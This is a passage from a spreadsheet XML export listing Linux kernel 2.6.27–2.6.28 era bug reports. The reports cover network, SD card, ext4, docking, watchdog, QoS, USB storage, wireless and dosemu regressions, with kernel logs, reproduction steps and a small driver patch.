    <t>Latest working kernel version: 2.6.26.8 Earliest failing kernel version: 2.6.27 Distribution: Ubuntu Hardware Environment: amd64, KVM Software Environment: Problem Description: As reported in LP #296767 (https://bugs.launchpad.net/ubuntu/+source/linux/+bug/296767) I am experiencing intermittent TCP issues over a PPP ADSL2+ connection with the only change being an upgrade to 2.6.27. A number of websites, ping, traceroute work correctly but I simply can't connect to several including: - store.apple.com - youtube.com - ANZ internet banking (anz.com.au) - MSN messenger I have also tried compiling a generic 2.6.28-rc4 kernel and this still suffers from the same issue, however if I reboot into the previous Ubuntu kernel (2.6.24) or a vanilla 2.6.26 kernel the issue disappears. Steps to reproduce: 1. Use a KVM guest as a gateway to a PPP internet connection 2. Boot with kernel &lt;= 2.6.26 3. Observe functioning networking 4. Boot into 2.6.27+ 5. Observe broken networking</t>
  </si>
  <si>
    <t>s3cmci hangs up in 2.6.28</t>
  </si>
  <si>
    <t>2008-12-31 14:20 UTC</t>
  </si>
  <si>
    <t>2012-05-24 14:02 UTC</t>
  </si>
  <si>
    <t>drivers_mmc-sd</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28 without of commit 088a78af978d0c8e339071a9b2bca1f4cb368f30 Earliest failing kernel version: 2.6.28 Distribution: http://openinkpot.org/ Hardware Environment: Hanlin V3 ebook reader. Samsung S3C2410 SoC. Software Environment: System boots from SD card with rootfs on loop device in file on the SD card. Problem Description: When try to write to SD card, system hangs. With soft lockup detection enabled, kernel OOPS raised: [21474645.355000] BUG: soft lockup - CPU#0 stuck for 61s! [mmcqd:746] [21474645.355000] Modules linked in: lbookv3_battery power_supply lbookv3_keys nls_cp437 s3cmci [21474645.355000] irq event stamp: 146211 [21474645.355000] hardirqs last enabled at (146210): [&lt;c0021a64&gt;] __irq_svc+0xa4/0xc0 [21474645.355000] hardirqs last disabled at (146211): [&lt;c00219e8&gt;] __irq_svc+0x28/0xc0 [21474645.355000] softirqs last enabled at (146209): [&lt;c003a910&gt;] __do_softirq+0x114/0x130 [21474645.355000] softirqs last disabled at (146202): [&lt;c003ac74&gt;] irq_exit+0x54/0x5c [21474645.355000] [21474645.355000] Pid: 746, comm: mmcqd [21474645.355000] CPU: 0 Not tainted (2.6.28-v3-armel #563) [21474645.355000] PC is at do_pio_write+0xd8/0x12c [21474645.355000] LR is at 0xc1c982e0 [21474645.355000] pc : [&lt;c016163c&gt;] lr : [&lt;c1c982e0&gt;] psr: 80000013 [21474645.355000] sp : c094fd5c ip : 00000001 fp : c094fd74 [21474645.355000] r10: c094fe48 r9 : c1c98000 r8 : c1c98000 [21474645.355000] r7 : c094fe5c r6 : c05f14b8 r5 : c300003c r4 : 00000003 [21474645.355000] r3 : 000003c4 r2 : 0000003c r1 : 00000003 r0 : 00000000 [21474645.355000] Flags: Nzcv IRQs on FIQs on Mode SVC_32 ISA ARM Segment kernel [21474645.355000] Control: c000717f Table: 30a64000 DAC: 00000017 [21474645.355000] [&lt;c0022ecc&gt;] (show_regs+0x0/0x50) from [&lt;c0060c44&gt;] (softlockup_tick+0x114/0x16c) [21474645.355000] r4:c094e000 [21474645.355000] [&lt;c0060b30&gt;] (softlockup_tick+0x0/0x16c) from [&lt;c003f704&gt;] (run_local_timers+0x1c/0x20) [21474645.355000] [&lt;c003f6e8&gt;] (run_local_timers+0x0/0x20) from [&lt;c003f9f8&gt;] (update_process_times+0x2c/0x58) [21474645.355000] [&lt;c003f9cc&gt;] (update_process_times+0x0/0x58) from [&lt;c00254b4&gt;] (timer_tick+0xf4/0x11c) [21474645.355000] r5:00000000 r4:c0249dcc [21474645.355000] [&lt;c00253c0&gt;] (timer_tick+0x0/0x11c) from [&lt;c002b504&gt;] (s3c2410_timer_interrupt+0x10/0x18) [21474645.355000] r5:00000000 r4:c0246294 [21474645.355000] [&lt;c002b4f4&gt;] (s3c2410_timer_interrupt+0x0/0x18) from [&lt;c0061180&gt;] (handle_IRQ_event+0x2c/0x6c) [21474645.355000] [&lt;c0061154&gt;] (handle_IRQ_event+0x0/0x6c) from [&lt;c0062d24&gt;] (handle_edge_irq+0xf8/0x17c) [21474645.355000] r7:c024adb0 r6:c0246294 r5:0000001e r4:c024ad7c [21474645.355000] [&lt;c0062c2c&gt;] (handle_edge_irq+0x0/0x17c) from [&lt;c0021064&gt;] (__exception_text_start+0x64/0x84) [21474645.355000] r8:c1c98000 r7:c094fe5c r6:00004000 r5:00000000 r4:0000001e [21474645.355000] [&lt;c0021000&gt;] (__exception_text_start+0x0/0x84) from [&lt;c00219e8&gt;] (__irq_svc+0x28/0xc0) [21474645.355000] Exception stack(0xc094fd14 to 0xc094fd5c) [21474645.355000] fd00: 00000000 00000003 0000003c [21474645.355000] fd20: 000003c4 00000003 c300003c c05f14b8 c094fe5c c1c98000 c1c98000 c094fe48 [21474645.355000] fd40: c094fd74 00000001 c094fd5c c1c982e0 c016163c 80000013 ffffffff [21474645.355000] r5:f4000000 r4:ffffffff [21474645.355000] [&lt;c0161564&gt;] (do_pio_write+0x0/0x12c) from [&lt;c0161a18&gt;] (s3cmci_send_request+0x344/0x40c) [21474645.355000] r6:c094feb4 r5:00000000 r4:c1c982e0 [21474645.355000] [&lt;c01616d4&gt;] (s3cmci_send_request+0x0/0x40c) from [&lt;c0161d18&gt;] (s3cmci_request+0x64/0x6c) [21474645.355000] [&lt;c0161cb4&gt;] (s3cmci_request+0x0/0x6c) from [&lt;c015ab8c&gt;] (mmc_wait_for_req+0x150/0x168) [21474645.355000] r6:c094fe10 r5:c094fdf0 r4:c094fde8 [21474645.355000] [&lt;c015aa3c&gt;] (mmc_wait_for_req+0x0/0x168) from [&lt;c01606dc&gt;] (mmc_blk_issue_rq+0x140/0x4b4) [21474645.355000] [&lt;c016059c&gt;] (mmc_blk_issue_rq+0x0/0x4b4) from [&lt;c01611a8&gt;] (mmc_queue_thread+0xc0/0xe4) [21474645.355000] [&lt;c01610e8&gt;] (mmc_queue_thread+0x0/0xe4) from [&lt;c004a7dc&gt;] (kthread+0x60/0x94) [21474645.355000] [&lt;c004a77c&gt;] (kthread+0x0/0x94) from [&lt;c0038684&gt;] (do_exit+0x0/0x6b0) [21474645.355000] r6:00000000 r5:00000000 r4:00000000 When I revert the commit 088a78af978d0c8e339071a9b2bca1f4cb368f30, problem eliminated.</t>
  </si>
  <si>
    <t>Advisory: Debian's current initramdisk scripts break with an ext4 root</t>
  </si>
  <si>
    <t>2009-01-03 23:02 UTC</t>
  </si>
  <si>
    <t>2009-01-04 11:30 UTC</t>
  </si>
  <si>
    <t>This is just a heads-up to hopefully save other people some time. I'm running 2.6.28 with debian/unstable, finally converted the root to ext4, and discovered that Debian with an initrd can't boot it because the initrd scripts apparently decide it is an ext3 filesystem with unsupported features. Not that they report this: instead you get an ENODEV message that had me convinced ext4 wasn't registering itself or some other such weirdness. Works fine if you use a "rootfstype=ext4" kernel boot parameter, or no initrd.</t>
  </si>
  <si>
    <t>with 2.6.28 undock/dock work bad or freeze computer - Dell D430</t>
  </si>
  <si>
    <t>2009-01-04 12:29 UTC</t>
  </si>
  <si>
    <t>2009-02-21 09:25 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.26.2 Earliest failing kernel version:2.6.28 Distribution:Debian SID Hardware Environment: Dell D43 Software Environment: only kernel Problem Description: after upgrade kernel and undocking kernel prints info about undock but after while docking again.See atached dmesg. After this I lost keyboard and mouse. Sometime I get it back. Steps to reproduce: compile 2.6.28 and undock</t>
  </si>
  <si>
    <t>Loading iTCO_wdt.ko on 2.6.28 hangs (old) Dell Latitude</t>
  </si>
  <si>
    <t>2009-01-05 05:13 UTC</t>
  </si>
  <si>
    <t>Rutger Nijlunsing</t>
  </si>
  <si>
    <t>2009-02-19 11:38 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.28 Distribution: Debian Sid Hardware Environment: Dell Latitude with ICH2-M TCO device (version 1) Software Environment: Problem Description: Loading iTCO_wdt.ko hangs kernel hard: no ping, no keyboard, no sysrq response. Steps to reproduce: - build and run pristine 2.6.28 - insmod iTCO_wdt.ko</t>
  </si>
  <si>
    <t>TC Queueing rules doesn't work when using a 1000Mbit NIC</t>
  </si>
  <si>
    <t>2009-01-05 07:07 UTC</t>
  </si>
  <si>
    <t>Jorge Bastos</t>
  </si>
  <si>
    <t>2009-01-09 01:48 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.28 Distribution: Debian SID Hardware Environment: 1x P4 3.2GHZ with SMC compiled. 3GB DDR2 RAM SATA Disks Software Environment: Problem Description: I've always used TC for my QoS configuration, and always used a 100Mbit Realtek 8139 card. Now i changed my Switch to a 1000Mbit one, and started using the onboard Marvell NIC, with "sky2" driver, since then, the QoS just stoped working, and all my shaping rules, started to shape the traffic to 1/2 KB. Steps to reproduce: Below my TC rules, and i've always used and worked when i had the 100Mbit card. I must remember, if i reinsert the 100Mbit card, the shaping works as expected. ------- --- /sbin/tc qdisc del dev eth0 root /sbin/tc qdisc add dev eth0 root handle 1 cbq bandwidth 100Mbit avpkt 1000 cell 8 /sbin/tc class change dev eth0 root cbq weight 10Mbit allot 1514 /sbin/tc class add dev eth0 parent 1: classid 1:1280 cbq bandwidth 100Mbit rate 200Kbit weight 6kbit prio 5 allot 1514 cell 8 maxburst 20 avpkt 1000 bounded isolated /sbin/tc qdisc add dev eth0 parent 1:1280 handle 1280 tbf rate 200Kbit buffer 10Kb/8 limit 15Kb mtu 1500 /sbin/tc filter add dev eth0 parent 1:0 protocol ip prio 100 u32 match ip src 195.23.14.71 match ip sport 80 0xffff classid 1:1280 ---</t>
  </si>
  <si>
    <t>Nokia 5310 Xpress usb-storage not mounting "again"</t>
  </si>
  <si>
    <t>2009-01-05 13:04 UTC</t>
  </si>
  <si>
    <t>Jiri Burda</t>
  </si>
  <si>
    <t>2009-03-10 13:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: N/A Earliest failing kernel version: N/A Distribution: ArchLinux Hardware Environment: USB(ohci,ehci) Software Environment: gcc 4.3.2, glibc 2.9 Problem Description: I just pluged in my recently bought Nokia 5310 and nothing happend. Dmesg says: usb 1-1: new full speed USB device using uhci_hcd and address 2 usb 1-1: configuration #1 chosen from 1 choice Initializing USB Mass Storage driver... scsi2 : SCSI emulation for USB Mass Storage devices usbcore: registered new interface driver usb-storage USB Mass Storage support registered. usb-storage: device found at 2 usb-storage: waiting for device to settle before scanning scsi 2:0:0:0: Direct-Access Nokia Nokia 5310 Xpres 0000 PQ: 0 ANSI: 4 sd 2:0:0:0: [sdb] 3842049 512-byte hardware sectors (1967 MB) sd 2:0:0:0: [sdb] Write Protect is off sd 2:0:0:0: [sdb] Mode Sense: 04 00 00 00 sd 2:0:0:0: [sdb] Assuming drive cache: write through sd 2:0:0:0: [sdb] 3842049 512-byte hardware sectors (1967 MB) sd 2:0:0:0: [sdb] Write Protect is off sd 2:0:0:0: [sdb] Mode Sense: 04 00 00 00 sd 2:0:0:0: [sdb] Assuming drive cache: write through sdb: sd 2:0:0:0: [sdb] Attached SCSI removable disk sd 2:0:0:0: Attached scsi generic sg2 type 0 usb-storage: device scan complete sd 2:0:0:0: [sdb] Sense Key : 0x0 [current] sd 2:0:0:0: [sdb] ASC=0x0 ASCQ=0x0 sd 2:0:0:0: [sdb] Sense Key : 0x0 [current] sd 2:0:0:0: [sdb] ASC=0x0 ASCQ=0x0 sd 2:0:0:0: [sdb] Sense Key : 0x0 [current] sd 2:0:0:0: [sdb] ASC=0x0 ASCQ=0x0 sd 2:0:0:0: [sdb] Sense Key : 0x0 [current] sd 2:0:0:0: [sdb] ASC=0x0 ASCQ=0x0 sd 2:0:0:0: [sdb] Sense Key : 0x0 [current] sd 2:0:0:0: [sdb] ASC=0x0 ASCQ=0x0 .... This behavior is same as in bug 12099, but according to lsusb: lsusb -vs 001:002 Bus 001 Device 002: ID 0421:006a Nokia Mobile Phones Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x0421 Nokia Mobile Phones idProduct 0x006a bcdDevice 8.32 iManufacturer 1 iProduct 2 iSerial 3 bNumConfigurations 1 my new Nokia 5310 has newer firmware 8.32. So this fixed this bug on my computer: -- linux-2.6.28/drivers/usb/storage/unusual_devs.h +++ linux-2.6.28-NOKIA/drivers/usb/storage/unusual_devs.h @@ -182,7 +182,7 @@ US_FL_FIX_CAPACITY ), /* Patch for Nokia 5310 capacity */ -UNUSUAL_DEV( 0x0421, 0x006a, 0x0000, 0x0701, +UNUSUAL_DEV( 0x0421, 0x006a, 0x0000, 0x0832, "Nokia", "5310", US_SC_DEVICE, US_PR_DEVICE, NULL, Steps to reproduce: plug in nokia 5310 via usb with fimware v. 8.32</t>
  </si>
  <si>
    <t>David Maciejak</t>
  </si>
  <si>
    <t>ath9k drops connection after 2 to 3 minutes connected</t>
  </si>
  <si>
    <t>2009-01-06 10:24 UTC</t>
  </si>
  <si>
    <t>Levi Stanley</t>
  </si>
  <si>
    <t>2009-01-18 08:37 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28 Earliest failing kernel version: 2.6.28 Distribution: gentoo Hardware Environment: asus m70vm-x1 laptop Software Environment: gnome, firefox, thunderbird, eclipse, ssh tunnels, eio Problem Description: This new years, I compiled the linux kernel from source, hoping that the fixes on the ath9k would fix a dropping issue, that I was having in 2.6.27 which would only drop my connection if I left my laptop on over night, which wasn't a big issue. Anyway, the problem I am having now, is that when I get onto my system, it usually drops my connection after 2 to 3 minutes. I restart the connection /etc/init.d/net.wlan0 restart, then I get a connection to only be dropped 2 to 3 minutes again. I end up rebooting into the 2.6.27 kernel since it is much stabler. I also notice alot more missing keystrokes on the 2.6.28 kernel, this might be unrelated. Steps to reproduce: 1. Log on, and wait for it to drop connection. Or, just log on and restart by typing: /etc/init.d/net.wlan restart on a command line.</t>
  </si>
  <si>
    <t>ext4_block_to_path block too big cause cpu to burn</t>
  </si>
  <si>
    <t>2009-01-07 02:56 UTC</t>
  </si>
  <si>
    <t>2009-02-03 11:20 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: unknow Distribution: ubuntu Hardware Environment: dell optiplex 740 Software Environment: Problem Description: when mounting specially crafted ext4 image, after some few seconds (5s), kern.log is filled with some data and cpu reaches 100% Steps to reproduce: bunzip the image file enclosed and mount the image with mount -t ext4 -o loop ext4.img /media/tmp note: i also tried the 2.6.28-ext4-3 patch but it does not help Regards, David Maciejak Fortinet's FortiGuard Global Security Research Team</t>
  </si>
  <si>
    <t>eeepc (701) hotkeys do not work correctly</t>
  </si>
  <si>
    <t>2009-01-07 23:23 UTC</t>
  </si>
  <si>
    <t>Davide Rao</t>
  </si>
  <si>
    <t>2009-02-06 02:18 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.28 Earliest failing kernel version: 2.6.28 (previously I users eeepc_acpi built outside kernel tree but it no longer builds since 2.6.28 Distribution: modified slackware 12.1 Hardware Environment: asus eeepc 701 Software Environment: gcc (GCC) 4.2.3 Problem Description: most hotkeys do not work, /proc/acpi/asus directory is no longer avalible and hence all the means of controlling wifi, webcam, screen ... Steps to reproduce: build kernel with EEEPC_LAPTOP, X86, ACPI, BACKLIGHT_CLASS_DEVICE, HWMON, EXPERIMENTAL, RFKILL enabled ... install kernel and modules ... boot and notice the problem.</t>
  </si>
  <si>
    <t>2.6.28.8</t>
  </si>
  <si>
    <t>2011-07-30 05:51 UTC</t>
  </si>
  <si>
    <t>ondemand on scaling meters differently between Cores 0 and 1 on T8100</t>
  </si>
  <si>
    <t>2009-01-09 01:46 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26? Earliest failing kernel version: Hard to say, some time around 2.6.27.7-8 Distribution: Fedora 10 Hardware Environment: x86-64, Clevo M720R notebook with Intel Core 2 duo T8100 processor, X3100 graphics Software Environment: x64-64 Problem Description: On my T8100 notebook, when on AC power, the ondemand governor will only take the processor to full-speed (2.101 GHz) if a demanding job is running on Core 1. If the job is on Core 0, it'll only go up to 2.1 GHz, eventually; it sometimes stops at 1.6 GHz. Either way, scaling up happens more slowly for loads on Core 0. scaling_max_freq is correct at 2101000 in sysfs for both CPUs. Steps to reproduce: Boot, apply various loads to either core (nothing special, e.g. encoding Vorbis), and watch for described effect.</t>
  </si>
  <si>
    <t>debugging in dosemu causes lots of 'scheduling while atomic'</t>
  </si>
  <si>
    <t>2009-01-09 07:28 UTC</t>
  </si>
  <si>
    <t>2009-02-25 14:49 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none known Earliest failing kernel version: 2.6.28-rc8 Distribution: Debian Hardware Environment: mac mini T2300 cpu Software Environment: dosem 1.4.0 Problem Description: After stepping in freedos 'debug' utility the kernel starts to prints lots of 'scheduling while atomic; reports into the system log. It writes these messages at high rate until some subsequent operation causes dosemu to crash. To reproduce: 1) install dosemu 2) run debug 3) use the trace command in debug In the sample below I enter the "xor ax,ax" instruction to make sure no inherently problematic instruction is executed. "Welcome to dosemu 1.4.0.0!" C:\&gt;debug -A 07CA:0100 xor ax,ax 07CA:0102 -t AX=0000 BX=0000 CX=0000 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000 DS=07CA ES=07CA SS=07CA CS=07CA IP=0102 NV UP DI PL ZR NA PE NC 07CA:0102 00FF ADD BH,BH -q Segmentation fault Sample of the log - I have about 3 gigabytes of this. Jan 8 15:23:43 uvt316-2 kernel: [ 467.637133] Pid: 3170, comm: dosemu.bin Not tainted 2.6.28-macmini #1 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637136] Call Trace: Jan 8 15:23:43 uvt316-2 kernel: [ 467.637142] [&lt;c02c2895&gt;] schedule+0x8f/0x705 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637146] [&lt;c01337e2&gt;] __queue_work+0x4d/0x5a Jan 8 15:23:43 uvt316-2 kernel: [ 467.637187] [&lt;f8a20e81&gt;] ata_sff_qc_issue+0x1ba/0x1d8 [libata] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637230] [&lt;f892650e&gt;] scsi_done+0x0/0x8 [scsi_mod] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637272] [&lt;f8a19f82&gt;] ata_scsi_translate+0xcb/0xf7 [libata] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637278] [&lt;c02c3027&gt;] schedule_timeout+0x14/0xbb Jan 8 15:23:43 uvt316-2 kernel: [ 467.637321] [&lt;f8a1bacd&gt;] ata_scsi_queuecmd+0x1a1/0x1a9 [libata] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637326] [&lt;c01ddebd&gt;] elv_next_request+0x1aa/0x1b8 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637367] [&lt;f8926753&gt;] scsi_dispatch_cmd+0x17c/0x1dc [scsi_mod] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637406] [&lt;f892af4b&gt;] scsi_request_fn+0x3ca/0x480 [scsi_mod] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637410] [&lt;c02c2745&gt;] wait_for_common+0xca/0x12e Jan 8 15:23:43 uvt316-2 kernel: [ 467.637415] [&lt;c01210e9&gt;] default_wake_function+0x0/0x8 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637419] [&lt;c01e2363&gt;] blk_execute_rq+0x82/0x9b Jan 8 15:23:43 uvt316-2 kernel: [ 467.637435] [&lt;c01df99e&gt;] get_request+0x203/0x310 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637439] [&lt;c01dff45&gt;] get_request_wait+0x25/0x171 Jan 8 12:50:25 uvt316-2 kernel: imklog 3.18.2, log source = /proc/kmsg started. Jan 8 12:59:49 uvt316-2 kernel: [ 869.679880] BUG: scheduling while atomic: dosemu.bin/3205/0x00000001 Jan 8 12:59:49 uvt316-2 kernel: [ 869.689075] Modules linked in: binfmt_misc kvm_intel kvm xt_tcpudp xt_conntrack xt_state xt_dscp xt_DSCP xt_CLASSIFY ipt_LOG ipt_REJECT xt_owner nf_nat_ftp nf_conntrack_ftp nf_nat_sip nf_conntrack_sip nf_nat_h323 nf_conntrack_h323 nf_nat_pptp nf_conntrack_pptp nf_conntrack_proto_gre nf_nat_proto_gre nf_nat_irc nf_conntrack_irc iptable_filter iptable_nat ipt_MASQUERADE nf_nat xt_multiport xt_iprange nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 ip_tables x_tables tun bridge stp llc ipv6 af_packet hfsplus nls_base coretemp firewire_sbp2 loop arc4 hid_dell hid_pl hid_cypress hid_zpff hid_gyration hid_bright hid_sony hid_samsung hid_microsoft hid_tmff hid_monterey ecb hid_ezkey hid_apple hid_a4tech hid_logitech ath5k mac80211 usbhid ff_memless hid_cherry hid_sunplus hid_petalynx hid_belkin hid_chicony snd_hda_intel i2c_i801 pcspkr evdev led_class iTCO_wdt hid i2c_core snd_pcm snd_seq snd_timer snd_seq_device rng_core snd cfg80211 soundcore snd_page_alloc tpm_infineon tpm tpm_bios in Jan 8 12:59:49 uvt316-2 kernel: tel_agp video output button agpgart ext3 jbd mbcache sg sr_mod cdrom ata_generic sd_mod crc_t10dif usb_storage ata_piix ahci firewire_ohci firewire_core crc_itu_t libata scsi_mod ehci_hcd uhci_hcd usbcore sky2 thermal processor fan thermal_sys hwmon Jan 8 12:59:49 uvt316-2 kernel: [ 869.791579] Pid: 3205, comm: dosemu.bin Not tainted 2.6.28-rc7-macmini #1 Jan 8 12:59:49 uvt316-2 kernel: [ 869.802410] Call Trace: Jan 8 12:59:49 uvt316-2 kernel: [ 869.813129] [&lt;c02c26f5&gt;] schedule+0x8f/0x705 Jan 8 12:59:49 uvt316-2 kernel: [ 869.824103] [&lt;c013a96c&gt;] getnstimeofday+0x32/0xb5 Jan 8 12:59:49 uvt316-2 kernel: [ 869.835069] [&lt;c013a9fe&gt;] do_gettimeofday+0xf/0x29 Jan 8 12:59:49 uvt316-2 kernel: [ 869.846022] [&lt;c012e598&gt;] sys_rt_sigsuspend+0xbc/0xd9 Jan 8 12:59:49 uvt316-2 kernel: [ 869.856975] [&lt;c010398b&gt;] sysenter_do_call+0x12/0x2f Jan 8 12:59:49 uvt316-2 kernel: [ 869.867902] BUG: scheduling while atomic: dosemu.bin/3205/0x00000001 Jan 8 12:59:49 uvt316-2 kernel: [ 869.878780] Modules linked in: binfmt_misc kvm_intel kvm xt_tcpudp xt_conntrack xt_state xt_dscp xt_DSCP xt_CLASSIFY ipt_LOG ipt_REJECT xt_owner nf_nat_ftp nf_conntrack_ftp nf_nat_sip nf_conntrack_sip nf_nat_h323 nf_conntrack_h323 nf_nat_pptp nf_conntrack_pptp nf_conntrack_proto_gre nf_nat_proto_gre nf_nat_irc nf_conntrack_irc iptable_filter iptable_nat ipt_MASQUERADE nf_nat xt_multiport xt_iprange nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 ip_tables x_tables tun bridge stp llc ipv6 af_packet hfsplus nls_base coretemp firewire_sbp2 loop arc4 hid_dell hid_pl hid_cypress hid_zpff hid_gyration hid_bright hid_sony hid_samsung hid_micro...skipping... nntrack_ipv4 nf_conntrack nf_defrag_ipv4 ip_tables x_tables tun bridge stp llc ipv6 af_packet hfsplus nls_base co retemp firewire_sbp2 loop hid_dell hid_pl hid_cypress hid_zpff hid_gyration hid_bright hid_sony hid_samsung hid_m icrosoft hid_tmff hid_monterey hid_ezkey hid_apple hid_a4tech hid_logitech arc4 ecb ff_memless hid_cherry hid_sun plus hid_petalynx evdev snd_hda_intel hid_belkin hid_chicony ath5k usbhid i2c_i801 iTCO_wdt mac80211 snd_pcm snd_ seq snd_timer snd_seq_device i2c_core pcspkr hid led_class rng_core snd soundcore snd_page_alloc cfg80211 tpm_inf ineon tpm tp Jan 8 15:23:43 uvt316-2 kernel: m_bios intel_agp video output agpgart button ext3 jbd mbcache sg sr_mod cdrom at a_generic sd_mod crc_t10dif usb_storage ata_piix ahci libata scsi_mod firewire_ohci firewire_core crc_itu_t ehci_ hcd uhci_hcd usbcore sky2 thermal processor fan thermal_sys hwmon Jan 8 15:23:43 uvt316-2 kernel: [ 467.637133] Pid: 3170, comm: dosemu.bin Not tainted 2.6.28-macmini #1 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637136] Call Trace: Jan 8 15:23:43 uvt316-2 kernel: [ 467.637142] [&lt;c02c2895&gt;] schedule+0x8f/0x705 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637146] [&lt;c01337e2&gt;] __queue_work+0x4d/0x5a Jan 8 15:23:43 uvt316-2 kernel: [ 467.637187] [&lt;f8a20e81&gt;] ata_sff_qc_issue+0x1ba/0x1d8 [libata] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637230] [&lt;f892650e&gt;] scsi_done+0x0/0x8 [scsi_mod] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637272] [&lt;f8a19f82&gt;] ata_scsi_translate+0xcb/0xf7 [libata] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637278] [&lt;c02c3027&gt;] schedule_timeout+0x14/0xbb Jan 8 15:23:43 uvt316-2 kernel: [ 467.637321] [&lt;f8a1bacd&gt;] ata_scsi_queuecmd+0x1a1/0x1a9 [libata] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637326] [&lt;c01ddebd&gt;] elv_next_request+0x1aa/0x1b8 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637367] [&lt;f8926753&gt;] scsi_dispatch_cmd+0x17c/0x1dc [scsi_mod] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637406] [&lt;f892af4b&gt;] scsi_request_fn+0x3ca/0x480 [scsi_mod] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637410] [&lt;c02c2745&gt;] wait_for_common+0xca/0x12e Jan 8 15:23:43 uvt316-2 kernel: [ 467.637415] [&lt;c01210e9&gt;] default_wake_function+0x0/0x8 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637419] [&lt;c01e2363&gt;] blk_execute_rq+0x82/0x9b Jan 8 15:23:43 uvt316-2 kernel: [ 467.637422] [&lt;c01e2234&gt;] blk_end_sync_rq+0x0/0x23 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637427] [&lt;c01e9027&gt;] cfq_set_request+0x0/0x2ab Jan 8 15:23:43 uvt316-2 kernel: [ 467.637431] [&lt;c01dd2f7&gt;] elv_set_request+0x14/0x22 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637435] [&lt;c01df99e&gt;] get_request+0x203/0x310 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637439] [&lt;c01dff45&gt;] get_request_wait+0x25/0x171 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637480] [&lt;f892c090&gt;] scsi_execute+0xce/0x116 [scsi_mod] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637518] [&lt;f892c12e&gt;] scsi_execute_req+0x56/0x7d [scsi_mod] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637557] [&lt;f892757d&gt;] ioctl_internal_command+0x48/0x123 [scsi_mod] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637604] [&lt;f8927699&gt;] scsi_set_medium_removal+0x41/0x65 [scsi_mod] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637627] [&lt;f89ff09e&gt;] cdrom_release+0x157/0x1a5 [cdrom] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637632] [&lt;c0174563&gt;] shmem_truncate+0xf/0x12 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637637] [&lt;c02c4428&gt;] _spin_lock+0x5/0x7 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637640] [&lt;c0174566&gt;] shmem_delete_inode+0x0/0xcc Jan 8 15:23:43 uvt316-2 kernel: [ 467.637658] [&lt;f8a3a36d&gt;] sr_block_release+0xf/0x1a [sr_mod] Jan 8 15:23:43 uvt316-2 kernel: [ 467.637663] [&lt;c019741c&gt;] __blkdev_put+0x7a/0x10f Jan 8 15:23:43 uvt316-2 kernel: [ 467.637666] [&lt;c017ad8f&gt;] __fput+0xa6/0x14c Jan 8 15:23:43 uvt316-2 kernel: [ 467.637670] [&lt;c0178706&gt;] filp_close+0x4d/0x53 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637675] [&lt;c01275db&gt;] put_files_struct+0x60/0xa6 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637679] [&lt;c0128c11&gt;] do_exit+0x1b0/0x6c7 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637683] [&lt;c0129190&gt;] do_group_exit+0x68/0x8f Jan 8 15:23:43 uvt316-2 kernel: [ 467.637687] [&lt;c0130a59&gt;] get_signal_to_deliver+0x314/0x337 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637691] [&lt;c0130388&gt;] force_sig_info+0x95/0x9f Jan 8 15:23:43 uvt316-2 kernel: [ 467.637695] [&lt;c0117e7b&gt;] do_page_fault+0x0/0x661 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637699] [&lt;c0102cab&gt;] do_notify_resume+0x64/0x6ba Jan 8 15:23:43 uvt316-2 kernel: [ 467.637703] [&lt;c02c0000&gt;] native_cpu_up+0x61c/0x664 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637707] [&lt;c0117e7b&gt;] do_page_fault+0x0/0x661 Jan 8 15:23:43 uvt316-2 kernel: [ 467.637710] [&lt;c0103aa0&gt;] work_notifysig+0x13/0x1b Jan 9 03:12:33 uvt316-2 kernel: [42998.259051] [drm:i915_wait_irq] *ERROR* EBUSY -- rec: 44615424 emitted: 44615428</t>
  </si>
  <si>
    <t>2.6.28-rc9: oprofile regression</t>
  </si>
  <si>
